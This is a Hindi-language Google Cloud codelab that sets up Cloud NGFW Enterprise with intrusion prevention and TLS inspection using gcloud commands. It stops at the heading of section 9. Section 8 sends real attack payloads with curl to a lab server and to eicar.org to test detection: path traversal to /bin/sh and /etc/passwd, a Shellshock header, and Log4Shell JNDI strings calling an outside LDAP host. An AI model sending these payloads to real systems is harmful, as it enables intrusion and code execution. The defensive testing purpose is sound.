1. परिचय
क्लाउड नेक्स्ट जनरेशन फ़ायरवॉल (एनजीएफ़डब्ल्यू)
Cloud Next Generation Firewall, पूरी तरह से डिस्ट्रिब्यूट की गई फ़ायरवॉल सेवा है. इसमें बेहतर सुरक्षा की सुविधाएं, माइक्रो-सेगमेंटेशन, और बेहतर कवरेज शामिल है. इससे आपके Google Cloud वर्कलोड को अंदरूनी और बाहरी हमलों से बचाया जा सकता है.
Cloud NGFW के ये फ़ायदे हैं:
- डिस्ट्रिब्यूटेड फ़ायरवॉल सेवा: Cloud NGFW, हर वर्कलोड पर स्टेटफ़ुल और पूरी तरह से डिस्ट्रिब्यूटेड होस्ट-आधारित एनफ़ोर्समेंट उपलब्ध कराता है. इससे, शून्य-भरोसे वाले सुरक्षा आर्किटेक्चर को चालू किया जा सकता है.
- आसान कॉन्फ़िगरेशन और डिप्लॉयमेंट: Cloud NGFW नेटवर्क और हैरारकी वाली फ़ायरवॉल की नीतियों को लागू करता है, जिन्हें रिसॉर्स हैरारकी के नोड से अटैच किया जा सकता है. ये नीतियां, Google Cloud के संसाधनों की हैरारकी में फ़ायरवॉल का एक जैसा अनुभव देती हैं.
- बेहतर कंट्रोल और माइक्रो-सेगमेंटेशन: फ़ायरवॉल की नीतियों और पहचान और ऐक्सेस मैनेजमेंट (IAM) से मैनेज किए जाने वाले टैग के कॉम्बिनेशन से, वर्चुअल प्राइवेट क्लाउड (वीपीएन) नेटवर्क और संगठनों में, नॉर्थ-साउथ और ईस्ट-वेस्ट, दोनों तरह के ट्रैफ़िक को बेहतर तरीके से कंट्रोल किया जा सकता है. यह कंट्रोल, एक वीएम तक किया जा सकता है.
Cloud NGFW इन टीयर में उपलब्ध है:
- क्लाउड नेक्स्ट जनरेशन फ़ायरवॉल ज़रूरी है
- क्लाउड नेक्स्ट जनरेशन फ़ायरवॉल स्टैंडर्ड
- Cloud Next Generation Firewall Enterprise
Cloud NGFW Enterprise
Cloud NGFW Enterprise, डिस्ट्रिब्यूटेड Google Cloud फ़ायरवॉल फ़ैब्रिक में, लेयर 7 की सुविधा, घुसपैठ रोकथाम सेवा (आईपीएस) जोड़ता है. टीएलएस एन्क्रिप्ट (सुरक्षित) किए गए ट्रैफ़िक की जांच करने के लिए, टीएलएस जांच की सुविधा काम करती है.
अब अपने नेटवर्क आर्किटेक्चर या रूटिंग कॉन्फ़िगरेशन में कोई बदलाव किए बिना, बेहतर कंट्रोल के साथ लेयर 7 नेक्स्ट जनरेशन फ़ायरवॉल (एनजीएफ़डब्ल्यू) की जांच की जा सकती है.
आईपीएस के साथ लेयर 7 फ़ायरवॉल कंट्रोल को चालू और डिप्लॉय करने के लिए, आपको ये काम करने होंगे:
- Google Cloud के मैनेज किए जा रहे ज़ोनल फ़ायरवॉल एंडपॉइंट का सेट बनाएं.
- इसके अलावा, TLS जांच की नीति भी बनाई जा सकती है.
- विकल्प के तौर पर कोई ट्रस्ट कॉन्फ़िगरेशन बनाएं.
- इन एंडपॉइंट को उन वर्चुअल प्राइवेट क्लाउड (VPC) नेटवर्क से जोड़ें जहां आपको Cloud NGFW Enterprise सेवा की ज़रूरत है.
- अलग-अलग ट्रैफ़िक पाथ के लिए, खतरे से बचाव करने वाली प्रोफ़ाइलों की जानकारी देने के लिए, अपनी मौजूदा फ़ायरवॉल नीतियों और फ़ायरवॉल नियमों में आसान बदलाव करें.
नेटवर्क फ़ायरवॉल की नीतियां
नेटवर्क फ़ायरवॉल की नीति, फ़ायरवॉल के नियमों के लिए कंटेनर के तौर पर काम करती है. नेटवर्क फ़ायरवॉल नीति में तय किए गए नियम तब तक कहीं भी लागू नहीं होते, जब तक कि नीति किसी वीपीएन नेटवर्क से जुड़ी न हो. हर VPC नेटवर्क के साथ, एक नेटवर्क फ़ायरवॉल नीति जुड़ी हो सकती है. नेटवर्क फ़ायरवॉल की नीतियां, फ़ायरवॉल के नियमों में IAM की मदद से चलने वाले टैग (या सिर्फ़ टैग) के साथ काम करती हैं. ये नियम मौजूदा नेटवर्क टैग की जगह ले लेते हैं. साथ ही, इनका इस्तेमाल वर्कलोड के लिए पहचान देने के लिए किया जा सकता है.
सभी नेटवर्क पर नेटवर्क फ़ायरवॉल की नीति शेयर करने और IAM से मैनेज किए जाने वाले टैग के साथ इंटिग्रेट करने से, फ़ायरवॉल को कॉन्फ़िगर और मैनेज करना काफ़ी आसान हो जाता है.
नेटवर्क फ़ायरवॉल नीति के लागू होने के बाद, Google Cloud की फ़ायरवॉल नीतियां में अब ये कॉम्पोनेंट शामिल हैं:
- हियरार्की वाली फ़ायरवॉल नीति
- VPC फ़ायरवॉल के नियम
- नेटवर्क फ़ायरवॉल की नीति ( ग्लोबल और रीजनल)
हैरारकी वाली फ़ायरवॉल नीतियां, संसाधन की हैरारकी में संगठन और फ़ोल्डर नोड पर काम करती हैं. वहीं, VPC फ़ायरवॉल के नियम और नेटवर्क फ़ायरवॉल की नीतियां, VPC लेवल पर लागू होती हैं. VPC फ़ायरवॉल के नियमों और नेटवर्क फ़ायरवॉल की नीतियों के बीच का बड़ा अंतर यह है कि VPC फ़ायरवॉल के नियम सिर्फ़ एक VPC नेटवर्क पर लागू किए जा सकते हैं. वहीं, नेटवर्क फ़ायरवॉल की नीतियां, एक VPC या VPC के ग्रुप से जुड़ी जा सकती हैं. साथ ही, इनसे बैच अपडेट जैसे अन्य फ़ायदे भी मिलते हैं.
आखिर में, हमारे पास ऐसे फ़ायरवॉल नियम भी हैं जो हर VPC नेटवर्क के साथ आते हैं:
- ऐसा एग्ज़िट रूल जिसकी कार्रवाई 'अनुमति दें' है और डेस्टिनेशन 0.0.0.0/0 है
- ऐसा इनग्रेस नियम जिसकी कार्रवाई 'अस्वीकार करें' है और सोर्स 0.0.0.0/0 है
नीति उल्लंघन ठीक करने का क्रम, डिफ़ॉल्ट रूप से इस डायग्राम में दिखाया गया है:
कृपया ध्यान दें कि VPC फ़ायरवॉल के नियमों और ग्लोबल नेटवर्क फ़ायरवॉल की नीति के बीच, नीति उल्लंघन ठीक करने के तरीके (एनफ़ोर्समेंट) को बदला जा सकता है. ग्राहक, gcloud कमांड की मदद से, किसी भी समय नीति उल्लंघन ठीक करने का आदेश दे सकते हैं.
टैग
नेटवर्क फ़ायरवॉल नीति के नियमों में इंटिग्रेट किए गए नए टैग, की-वैल्यू पेयर वाले ऐसे रिसॉर्स हैं जिन्हें Google Cloud के रिसॉर्स के लेआउट में, संगठन या प्रोजेक्ट-लेवल पर तय किया जाता है. ऐसे टैग में IAM ऐक्सेस कंट्रोल होते हैं. इनसे पता चलता है कि टैग पर कौन क्या कर सकता है. उदाहरण के लिए, पहचान और ऐक्सेस मैनेजमेंट (आईएएम) की अनुमतियों से यह तय किया जा सकता है कि कौनसे मुख्य खाते, टैग को वैल्यू असाइन कर सकते हैं और कौनसे मुख्य खाते, संसाधनों में टैग अटैच कर सकते हैं. अगर नेटवर्क फ़ायरवॉल का कोई नियम किसी टैग का रेफ़रंस देता है, तो उसे लागू करने के लिए, उसे किसी संसाधन पर लागू करना होगा.
टैग, Google Cloud के इनहेरिटेंस रिसॉर्स मॉडल का पालन करते हैं. इसका मतलब है कि टैग और उनकी वैल्यू, पैरंट से हैरारकी में नीचे की ओर भेजी जाती हैं. इस वजह से, टैग एक ही जगह पर बनाए जा सकते हैं और फिर संसाधनों की हैरारकी में मौजूद अन्य फ़ोल्डर और प्रोजेक्ट में उनका इस्तेमाल किया जा सकता है. टैग और ऐक्सेस से जुड़ी पाबंदी के बारे में जानने के लिए, इस पेज पर जाएं.
टैग को नेटवर्क टैग से जोड़कर नहीं समझा जाना चाहिए. बाद वाली स्ट्रिंग, Compute Engine इंस्टेंस में जोड़ी जा सकती हैं. ये इंस्टेंस से जुड़ी होती हैं और इंस्टेंस बंद होने पर हट जाती हैं. VPC फ़ायरवॉल के नियमों में नेटवर्क टैग शामिल हो सकते हैं, लेकिन इन्हें क्लाउड रिसॉर्स नहीं माना जाता है. इसलिए, इन पर IAM ऐक्सेस कंट्रोल लागू नहीं होता.
ध्यान दें कि इस दस्तावेज़ में टैग और IAM से चलने वाले टैग, एक-दूसरे की जगह पर इस्तेमाल किए जा रहे हैं.
आपको क्या बनाना होगा
इस कोडलैब में एक प्रोजेक्ट की ज़रूरत होती है. साथ ही, इसमें VPC नेटवर्क बनाने के साथ-साथ कई नेटवर्क और सुरक्षा संसाधनों को मैनेज करने की सुविधा भी होती है. इसमें यह दिखाया जाएगा कि Cloud NGFW Enterprise, IPS की सुविधा कैसे दे सकता है:
- TLS की मदद से, नॉर्थबाउंड इंटरनेट फ़्लो की जांच करना
- TLS जांच की मदद से, वीपीसी के अंदर के फ़्लो [ईस्ट-वेस्ट] की जांच करना
जिन फ़्लो की जांच करनी है उन्हें Cloud Firewall के मैचिंग पैरामीटर का इस्तेमाल करके चुना जाएगा. इन पैरामीटर में, पांच ट्यूपल (सोर्स आईपी, डेस्टिनेशन आईपी, प्रोटोकॉल, सोर्स पोर्ट, डेस्टिनेशन पोर्ट) और टैग शामिल हैं.
नेटवर्क फ़ायरवॉल की नीति के नियम बेस के खत्म होने की स्थिति, नीचे दी गई टेबल की तरह होगी:
प्राथमिकता | लिखने की दिशा | Target | सोर्स | जगह | कार्रवाई | स्ट्रीम किस तरह की है |
100 | इन्ग्रेस डेटा ट्रैफ़िक | Server_Tag | हेल्थ-चेक | कोई भी | अनुमति दें | इन्हें ज़रूर आज़माएं |
200 | इन्ग्रेस डेटा ट्रैफ़िक | Client_Tag, Server_Tag | IAP | कोई भी | अनुमति दें | इन्हें ज़रूर आज़माएं |
800 | इन्ग्रेस डेटा ट्रैफ़िक | Server_Tag | 10.0.0.0/24 | 10.0.0.0/24 | L7 जांच | एंटरप्राइज़ |
850 | इग्रेस डेटा ट्रैफ़िक | Client_Tag | कोई भी | 10.0.0.0/24 | अनुमति दें | इन्हें ज़रूर आज़माएं |
900 | इग्रेस डेटा ट्रैफ़िक | Client_Tag | कोई भी | कोई भी | L7 की जांच | एंटरप्राइज़ |
आपको इनके बारे में जानकारी मिलेगी
- नेटवर्क फ़ायरवॉल नीति बनाने का तरीका.
- नेटवर्क फ़ायरवॉल नीति के साथ टैग बनाने और उनका इस्तेमाल करने का तरीका.
- टीएलएस जांच की सुविधा के साथ Cloud NGFW Enterprise को कॉन्फ़िगर और इस्तेमाल करने का तरीका.
आपको इन चीज़ों की ज़रूरत होगी
- Google Cloud प्रोजेक्ट.
- इंस्टेंस को डिप्लॉय करने और नेटवर्किंग कॉम्पोनेंट को कॉन्फ़िगर करने के बारे में जानकारी.
- वीपीसी फ़ायरवॉल कॉन्फ़िगरेशन के बारे में जानकारी.
2. शुरू करने से पहले
वैरिएबल बनाना/अपडेट करना
यह कोडलैब, Cloud Shell में gcloud कॉन्फ़िगरेशन लागू करने में मदद करने के लिए $variables का इस्तेमाल करता है.
Cloud Shell में, ब्रैकेट में दी गई जानकारी को ज़रूरत के मुताबिक बदलकर, नीचे दिए गए निर्देश चलाएं:
gcloud config set project [project-id] export project_id=$(gcloud config list --format="value(core.project)") export project_number=`gcloud projects describe $project_id --format="value(projectNumber)"` export org_id=$(gcloud projects get-ancestors $project_id --format="csv[no-heading](id,type)" | grep ",organization$" | cut -d"," -f1 ) export region=[region] export zone=[zone] export prefix=ngfw-enterprise export billing_project=[billing-project-id]
3. एपीआई चालू करें
अगर आपने एपीआई चालू नहीं किए हैं, तो उन्हें चालू करें:
gcloud services enable networksecurity.googleapis.com gcloud services enable certificatemanager.googleapis.com gcloud services enable networkservices.googleapis.com gcloud services enable privateca.googleapis.com
4. Cloud NGFW एंटरप्राइज़ एंडपॉइंट क्रिएशन
Cloud NGFW Enterprise एंडपॉइंट बनाने में करीब 20 मिनट लगते हैं. इसलिए, इसे पहले बनाया जाएगा. साथ ही, एंडपॉइंट बनने के दौरान, बुनियादी सेटअप भी किया जा सकता है.
सुरक्षा प्रोफ़ाइल और सुरक्षा प्रोफ़ाइल ग्रुप बनाएं:
gcloud network-security security-profiles threat-prevention \ create $prefix-sp-threat \ --organization $org_id \ --location=global gcloud network-security security-profile-groups create \ $prefix-spg \ --organization $org_id \ --location=global \ --threat-prevention-profile organizations/$org_id/locations/global/securityProfiles/$prefix-sp-threat
अनुमानित आउटपुट:
Waiting for security-profile [organizations/$org_id/locations/global/securityProfiles/$prefix-sp-threat] to be created...done. Waiting for operation [organizations/$org_id/locations/global/operations/operation-1687458013374-5febbef75e993-ea522924-c963d150] to complete...done.
पुष्टि करें कि संसाधन सही तरीके से बनाए गए हैं:
gcloud network-security security-profiles threat-prevention \ list --location=global --organization $org_id gcloud network-security security-profile-groups list \ --organization $org_id --location=global
अनुमानित आउटपुट (ध्यान दें कि इस्तेमाल किए जा रहे क्लाइंट के हिसाब से आउटपुट का फ़ॉर्मैट अलग-अलग हो सकता है:
NAME: ngfw-enterprise-sp-threat NAME: ngfw-enterprise-spg
Cloud NGFW Enterprise एंडपॉइंट बनाएं:
gcloud network-security firewall-endpoints create $prefix-$zone \ --zone=$zone \ --organization $org_id \ --billing-project=$billing_project
नीचे दिया गया निर्देश चलाकर पुष्टि करें कि एंडपॉइंट बनाया जा रहा है (CREATING).
gcloud network-security firewall-endpoints list --zone $zone \ --organization $org_id
अनुमानित आउटपुट (ध्यान दें कि इस्तेमाल किए जा रहे क्लाइंट के हिसाब से आउटपुट फ़ॉर्मैट अलग-अलग हो सकता है):
ID: $prefix-$zone LOCATION: $zone STATE: CREATING
ज़्यादा जानकारी पाने के लिए, नीचे दिया गया कमांड चलाएं:
gcloud network-security firewall-endpoints describe \ $prefix-$zone --organization $org_id --zone $zone
अनुमानित आउटपुट:
createTime: '2023-11-16T04:27:17.677731831Z' name: organizations/$org_id/locations/$zone/firewallEndpoints/$prefix-$zone state: CREATING updateTime: '2023-11-16T04:27:17.677731831Z'
इसे बनाने में करीब 20 मिनट लगते हैं. एक साथ ज़रूरी संसाधन बनाने के लिए, बेस सेटअप सेक्शन पर जाएं.
5. बुनियादी सेटअप
VPC नेटवर्क और सबनेट
VPC नेटवर्क और सबनेट
VPC नेटवर्क और सबनेट बनाएं:
gcloud compute networks create $prefix-vpc --subnet-mode=custom gcloud compute networks subnets create $prefix-$region-subnet \ --range=10.0.0.0/24 --network=$prefix-vpc --region=$region
क्लाउड एनएटी
क्लाउड राऊटर और क्लाउड एनएटी गेटवे बनाएं:
gcloud compute addresses create $prefix-$region-cloudnatip --region=$region export cloudnatip=$(gcloud compute addresses list --filter=name:$prefix-$region-cloudnatip --format="value(address)") gcloud compute routers create $prefix-cr \ --region=$region --network=$prefix-vpc gcloud compute routers nats create $prefix-cloudnat-$region \ --router=$prefix-cr --router-region $region \ --nat-all-subnet-ip-ranges \ --nat-external-ip-pool=$prefix-$region-cloudnatip
इंस्टेंस
क्लाइंट और वेब-सर्वर इंस्टेंस बनाएं:
gcloud compute instances create $prefix-$zone-client \
--subnet=$prefix-$region-subnet --no-address --zone $zone \
--metadata startup-script='#! /bin/bash
apt-get update
apt-get install apache2-utils mtr iperf3 tcpdump -y'
gcloud compute instances create $prefix-$zone-www \
--subnet=$prefix-$region-subnet --no-address --zone $zone \
--metadata startup-script='#! /bin/bash
apt-get update
apt-get install apache2 tcpdump iperf3 -y
a2ensite default-ssl
a2enmod ssl
# Read VM network configuration:
md_vm="http://169.254.169.254/computeMetadata/v1/instance/"
vm_hostname="$(curl $md_vm/name -H "Metadata-Flavor:Google" )"
filter="{print \$NF}"
vm_network="$(curl $md_vm/network-interfaces/0/network \
-H "Metadata-Flavor:Google" | awk -F/ "${filter}")"
vm_zone="$(curl $md_vm/zone \
-H "Metadata-Flavor:Google" | awk -F/ "${filter}")"
# Apache configuration:
echo "Page on $vm_hostname in network $vm_network zone $vm_zone" | \
tee /var/www/html/index.html
systemctl restart apache2'
प्रोजेक्ट-लेवल टैग
अगर ज़रूरी हो, तो उपयोगकर्ता को tagAdmin की अनुमति असाइन करें:
export user_id=$(gcloud auth list --format="value(account)") gcloud projects add-iam-policy-binding $project_id --member user:$user_id --role roles/resourcemanager.tagAdmin
प्रोजेक्ट-लेवल की टैग कुंजी और वैल्यू बनाएं:
gcloud resource-manager tags keys create $prefix-vpc-tags \ --parent projects/$project_id \ --purpose GCE_FIREWALL \ --purpose-data network=$project_id/$prefix-vpc gcloud resource-manager tags values create $prefix-vpc-client \ --parent=$project_id/$prefix-vpc-tags gcloud resource-manager tags values create $prefix-vpc-server \ --parent=$project_id/$prefix-vpc-tags
टैग को इंस्टेंस से बाइंड करें:
gcloud resource-manager tags bindings create \ --location $zone \ --tag-value $project_id/$prefix-vpc-tags/$prefix-vpc-server \ --parent //compute.googleapis.com/projects/$project_id/zones/$zone/instances/$prefix-$zone-www gcloud resource-manager tags bindings create \ --location $zone \ --tag-value $project_id/$prefix-vpc-tags/$prefix-vpc-client \ --parent //compute.googleapis.com/projects/$project_id/zones/$zone/instances/$prefix-$zone-client
ग्लोबल नेटवर्क फ़ायरवॉल की नीति
वैश्विक नेटवर्क फ़ायरवॉल की नीति बनाएं:
gcloud compute network-firewall-policies create \ $prefix-fwpolicy --description \ "Cloud NGFW Enterprise with TLS" --global
हेल्थ चेक और पहचान की जानकारी रखने वाले प्रॉक्सी की रेंज से आने वाले ट्रैफ़िक को अनुमति देने के लिए, Cloud फ़ायरवॉल के ज़रूरी नियम बनाएं:
gcloud compute network-firewall-policies rules create 100 \
--description="allow http traffic from health-checks ranges" \
--action=allow \
--firewall-policy=$prefix-fwpolicy \
--global-firewall-policy \
--layer4-configs=tcp:80,tcp:443 \
--direction=INGRESS \
--target-secure-tags $project_id/$prefix-vpc-tags/$prefix-vpc-server \
--src-ip-ranges=35.191.0.0/16,130.211.0.0/22,209.85.152.0/22,209.85.204.0/22
gcloud compute network-firewall-policies rules create 200 \
--description="allow ssh traffic from identity-aware-proxy ranges" \
--action=allow \
--firewall-policy=$prefix-fwpolicy \
--global-firewall-policy \
--layer4-configs=tcp:22 \
--direction=INGRESS \
--target-secure-tags $project_id/$prefix-vpc-tags/$prefix-vpc-server,$project_id/$prefix-vpc-tags/$prefix-vpc-client \
--src-ip-ranges=35.235.240.0/20
तय की गई रेंज से ईस्ट-वेस्ट / इंट्रा-सबनेट ट्रैफ़िक को अनुमति देने के लिए, Cloud Firewall के ज़रूरी नियम बनाएं. TLS की जांच के साथ Cloud NGFW Enterprise को चालू करने के लिए, इन नियमों को अपडेट किया जाएगा:
gcloud compute network-firewall-policies rules create 800 \
--description "allow ingress internal traffic from tagged clients" \
--action=allow \
--firewall-policy=$prefix-fwpolicy \
--global-firewall-policy \
--direction=INGRESS \
--enable-logging \
--layer4-configs tcp:443 \
--src-ip-ranges=10.0.0.0/24 \
--dest-ip-ranges=10.0.0.0/24 \
--target-secure-tags $project_id/$prefix-vpc-tags/$prefix-vpc-server
क्लाउड फ़ायरवॉल की नीति को VPC नेटवर्क से जोड़ें:
gcloud compute network-firewall-policies associations create \
--firewall-policy $prefix-fwpolicy \
--network $prefix-vpc \
--name $prefix-fwpolicy-association \
--global-firewall-policy
6. Cloud Firewall Endpoint Association
अगर आपने अब तक एनवायरमेंट वैरिएबल तय नहीं किए हैं और/या स्क्रिप्ट का तरीका अपनाया है, तो एनवायरमेंट वैरिएबल तय करें.
पुष्टि करें कि Cloud Firewall एंडपॉइंट बनाने की प्रोसेस पूरी हो गई है. सिर्फ़ तब आगे बढ़ें, जब स्थिति चालू है के तौर पर दिखे. खाता बनाने के दौरान, स्थिति बनाया जा रहा है के तौर पर दिखती है:
gcloud network-security firewall-endpoints list --zone $zone \ --organization $org_id
अनुमानित आउटपुट (ध्यान दें कि इस्तेमाल किए जा रहे क्लाइंट के हिसाब से, आउटपुट फ़ॉर्मैट अलग-अलग हो सकता है):
ID: $prefix-$zone LOCATION: $zone STATE: ACTIVE
ज़्यादा जानकारी के लिए, नीचे दिया गया कमांड चलाएं:
gcloud network-security firewall-endpoints describe \ $prefix-$zone --organization $org_id --zone $zone
अनुमानित आउटपुट:
createTime: '2023-11-16T04:27:17.677731831Z' name: organizations/$org_id/locations/$zonefirewallEndpoints/$prefix-$zone state: ACTIVE updateTime: '2023-11-16T04:49:53.776349352Z'
Cloud फ़ायरवॉल एंडपॉइंट को VPC नेटवर्क से असोसिएट करें:
gcloud network-security firewall-endpoint-associations create \ $prefix-association --zone $zone \ --network=$prefix-vpc \ --endpoint $prefix-$zone \ --organization $org_id
खाते को जोड़ने में करीब 10 मिनट लगते हैं. स्टेटस चालू है के तौर पर दिखने के बाद ही, TLS सेक्शन पर जाएं. बनाने के दौरान, स्टेटस बनाया जा रहा है के तौर पर दिखता है:
gcloud network-security firewall-endpoint-associations list
पूरा होने पर अनुमानित आउटपुट:
ID: ngfw-enterprise-association LOCATION: $zone NETWORK: $prefix-vpc ENDPOINT: $prefix-$zone STATE: ACTIVE
ज़्यादा जानकारी पाने के लिए, नीचे दिया गया कमांड चलाएं:
gcloud network-security firewall-endpoint-associations \ describe $prefix-association --zone $zone
अनुमानित आउटपुट:
createTime: '2023-11-16T04:57:06.108377222Z' firewallEndpoint: organizations/$org_id/locations/$zone/firewallEndpoints/$prefix-$zone name: projects/$project_id/locations/$zone/firewallEndpointAssociations/$prefix-association network: projects/$project_id/global/networks/$prefix-vpc state: ACTIVE updateTime: '2023-11-16T04:57:06.108377222Z'
7. TLS रिसॉर्स कॉन्फ़िगर करना
सीए पूल बनाएं. इस संसाधन का इस्तेमाल, NGFW Enterprise के लिए जनरेट किए गए रूट सीए सर्टिफ़िकेट को सेव करने के लिए किया जाएगा.
gcloud privateca pools create $prefix-CA-Pool --project=$project_id --location=$region --tier=enterprise
रूट सीए (सर्टिफ़िकेट देने वाली संस्था) बनाएं. यह सीए सर्टिफ़िकेट है. इसका इस्तेमाल, NGFW Enterprise के ज़रिए अनुरोधों के लिए अतिरिक्त सर्टिफ़िकेट पर हस्ताक्षर करने के लिए किया जाएगा.
gcloud privateca roots create $prefix-CA-Root --project=$project_id --location=$region --pool=$prefix-CA-Pool --subject="CN=NGFW Enterprise Test CA 2, O=Google NGFW Enterprise Test"
अगर आपको नीचे दिया गया मैसेज दिखाया जाता है, तो y जवाब दें:
The CaPool [ngfw-enterprise-CA-Pool] has no enabled CAs and cannot issue any certificates until at least one CA is enabled. Would you like to also enable this CA? Do you want to continue (y/N)?
सेवा खाता बनाएं. इस सेवा खाते का इस्तेमाल, NGFW Enterprise के सर्टिफ़िकेट का अनुरोध करने के लिए किया जाएगा:
gcloud beta services identity create --service=networksecurity.googleapis.com --project=$project_id
सेवा खाते के लिए आईएएम अनुमतियां सेट करें:
gcloud privateca pools add-iam-policy-binding $prefix-CA-Pool --project=$project_id --location=$region --member=serviceAccount:service-$project_number@gcp-sa-networksecurity.iam.gserviceaccount.com --role=roles/privateca.certificateRequester
TLS नीति की YAML फ़ाइल बनाएं. इस फ़ाइल में, इन खास संसाधनों की जानकारी होगी:
cat > tls_policy.yaml << EOF description: Test tls inspection policy. name: projects/$project_id/locations/$region/tlsInspectionPolicies/$prefix-tls-policy caPool: projects/$project_id/locations/$region/caPools/$prefix-CA-Pool excludePublicCaSet: false EOF
टीएलएस जांच की नीति इंपोर्ट करें:
gcloud network-security tls-inspection-policies import $prefix-tls-policy --project=$project_id --location=$region --source=tls_policy.yaml
TLS चालू करने के लिए, एंडपॉइंट असोसिएशन को अपडेट करें:
gcloud network-security firewall-endpoint-associations update $prefix-association --zone=$zone --project=$project_id --tls-inspection-policy=$prefix-tls-policy --tls-inspection-policy-project=$project_id --tls-inspection-policy-region=$region
सीए सर्टिफ़िकेट पाएं और उसे क्लाइंट के सीए स्टोर में जोड़ें:
gcloud privateca roots describe $prefix-CA-Root --project=$project_id --pool=$prefix-CA-Pool --location=$region --format="value(pemCaCertificates)" >> $prefix-CA-Root.crt
सीए सर्टिफ़िकेट को क्लाइंट पर ट्रांसफ़र करें:
gcloud compute scp --tunnel-through-iap ~/$prefix-CA-Root.crt $prefix-$zone-client:~/ --zone=$zone
वीएम में एसएसएच करें, सीए सर्टिफ़िकेट को /usr/local/share/ca-certificates पर ले जाएं, और सीए स्टोर को अपडेट करें:
gcloud compute ssh $prefix-$zone-client --tunnel-through-iap --zone $zone sudo mv ngfw-enterprise-CA-Root.crt /usr/local/share/ca-certificates/ sudo update-ca-certificates
cloudshell पर वापस जाएं.
सर्वर सर्टिफ़िकेट साइन करने की प्रोसेस:
cloudshell पर, pip कमांड का इस्तेमाल करके Pyca क्रिप्टोग्राफ़ी लाइब्रेरी इंस्टॉल करें:
pip install --user "cryptography>=2.2.0"
Google Cloud SDK को Pyca क्रिप्टोग्राफ़ी लाइब्रेरी का इस्तेमाल करने की अनुमति देने के लिए, आपको साइट पैकेज चालू करने होंगे.
export CLOUDSDK_PYTHON_SITEPACKAGES=1
सर्वर सर्टिफ़िकेट बनाएं:
gcloud privateca certificates create --issuer-location=$region \ --issuer-pool $prefix-CA-Pool \ --subject "CN=Cloud NGFW Enterprise,O=Google" \ --ip-san=10.0.0.3 \ --generate-key \ --key-output-file=./key.pem \ --cert-output-file=./cert.pem
इससे cloudshell में cert.pem और key.pem फ़ाइल जनरेट हो जाएगी. इसके बाद, सर्टिफ़िकेट और पासकोड को सर्वर पर ट्रांसफ़र करें.
gcloud compute scp --tunnel-through-iap ~/cert.pem $prefix-$zone-www:~/ --zone=$zone gcloud compute scp --tunnel-through-iap ~/key.pem $prefix-$zone-www:~/ --zone=$zone
Apache के लिए सर्टिफ़िकेट की जानकारी अपडेट करने के लिए, सर्वर में एसएसएच की सुविधा:
gcloud compute ssh $prefix-$zone-www --tunnel-through-iap --zone $zone
सर्टिफ़िकेट और पासकोड को किसी फ़ोल्डर में ले जाएं:
sudo mv cert.pem /etc/ssl/certs/ sudo mv key.pem /etc/ssl/private/
हस्ताक्षर किए गए सर्टिफ़िकेट का इस्तेमाल करने के लिए, एसएसएल कॉन्फ़िगरेशन अपडेट करें:
sudo sed -i 's/ssl-cert-snakeoil.pem/cert.pem/g' /etc/apache2/sites-available/default-ssl.conf sudo sed -i 's/ssl-cert-snakeoil.key/key.pem/g' /etc/apache2/sites-available/default-ssl.conf
Apache को रीस्टार्ट करने के लिए:
sudo systemctl restart apache2
Apache के स्टेटस की पुष्टि करें:
sudo systemctl status apache2
यह चालू (चल रहा) होना चाहिए.
वर्चुअल मशीन (वीएम) से बाहर निकलें और cloudshell पर काम जारी रखें.
8. नॉर्थबाउंड और ई/डब्ल्यू कनेक्टिविटी की पुष्टि करना
Cloud Shell में नीचे दिए गए कमांड चलाएं और इस्तेमाल किए जाने वाले टारगेट आईपी को नोट करें:
gcloud compute instances list --filter="name=($prefix-$zone-www)"
नया टैब खोलें और आईएपी के ज़रिए क्लाइंट वीएम से एसएसएच कनेक्शन शुरू करें (आपको नए टैब में वैरिएबल तय करने होंगे):
gcloud compute ssh $prefix-$zone-client --tunnel-through-iap --zone $zone
नीचे दिए गए निर्देश चलाएं और इस्तेमाल किए जाने वाले टारगेट आईपी को नोट करें. ब्रैकेट के अंदर की वैल्यू को पिछले चरण में बताए गए आईपी से बदलकर वैरिएबल बनाएं और पक्का करें कि वे ऐक्सेस किए जा सकते हैं:
export target_privateip=[INTERNAL_IP_OF_WWW_SERVER]
निजी आईपी को कर्ल करें और पक्का करें कि उस तक पहुंचा जा सकता हो:
curl https://$target_privateip --max-time 2
curl अनुरोध के लिए मिलने वाले नतीजे:
Page on ngfw-enterprise-$zone-www in network ngfw-enterprise-vpc zone $zone
आईपी को सैंपल हमलों की जानकारी भेजें. वेब सर्वर को सभी अनुरोधों का जवाब देना चाहिए. इससे यह पुष्टि होती है कि L7 जांच/रोकथाम की सुविधा चालू नहीं है:
curl -w "%{http_code}\\n" -s -o /dev/null https://$target_privateip/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; uname -a' --max-time 2
curl -w "%{http_code}\\n" -s -o /dev/null https://$target_privateip/cgi-bin/user.sh -H 'FakeHeader:() { :; }; echo Content-Type: text/html; echo ; /bin/uname -a' --max-time 2
curl -w "%{http_code}\\n" -s -o /dev/null https://$target_privateip/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd --max-time 2
curl -w "%{http_code}\\n" -s -o /dev/null -H 'User-Agent: ${jndi:ldap://123.123.123.123:8055/a}' https://$target_privateip --max-time 2
curl -w "%{http_code}\\n" -s -o /dev/null -H 'User-Agent: ${jndi:ldap://123.123.123.123:8081/a}' https://$target_privateip --max-time 2
अनुमानित नतीजों के सैंपल (निजी आईपी):
400 404 400 200 200
इसी तरह, इंटरनेट डेस्टिनेशन पर अनुरोध भेजें:
curl -s -o /dev/null -w "%{http_code}\n" https://www.eicar.org/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; uname -a' --max-time 2
curl -s -o /dev/null -w "%{http_code}\n" https://www.eicar.org/cgi-bin/user.sh -H 'FakeHeader:() { :; }; echo Content-Type: text/html; echo ; /bin/uname -a' --max-time 2
curl -s -o /dev/null -w "%{http_code}\n" https://www.eicar.org/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd --max-time 2
curl -s -o /dev/null -w "%{http_code}\n" -H 'User-Agent: ${jndi:ldap://123.123.123.123:8055/a}' https://www.eicar.org --max-time 2
curl -s -o /dev/null -w "%{http_code}\n" -H 'User-Agent: ${jndi:ldap://123.123.123.123:8081/a}' https://www.eicar.org --max-time 2
अनुमानित नतीजों के सैंपल (इंटरनेट डेस्टिनेशन):
400 404 400 403 403
वीएम टर्मिनल से बाहर निकलें और क्लाउड शेल पर वापस जाएं.
9. टीएलएस जांच के लिए फ़ायरवॉल नियम बनाना और अपडेट करना
